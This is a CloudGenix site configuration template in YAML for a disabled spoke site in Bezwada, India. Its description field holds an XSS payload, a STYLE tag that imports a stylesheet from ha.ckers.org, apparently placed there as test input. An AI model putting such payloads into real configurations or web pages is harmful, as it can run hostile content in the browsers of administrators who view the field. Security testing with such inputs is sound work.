---
type: cloudgenix template
version: 1.0
# Created at 2020-10-05T12:26:14.302976Z
# by system_2750@soumyars.com
sites v4.5:
  BEZWADA_SITE:
    address:
      city: Bezwada
      country: India
      post_code:
      state:
      street:
      street2:
    admin_state: disabled
    description: '&lt;STYLE&gt;@import''http://ha.ckers.org/xss.css'';&lt;/STYLE&gt;'
    element_cluster_role: SPOKE
    elements v2.3: {}
    extended_tags:
    location:
      description:
      latitude: 16.520000457763672
      longitude: 80.62999725341797
    nat_policysetstack_id: Default-NATPolicySetStack
    network_policysetstack_id: NetworkPolicySetStack
    policy_set_id:
    priority_policysetstack_id: PriorityPolicySetStack
    security_policyset_id:
    service_binding: Preset Domain
    tags:
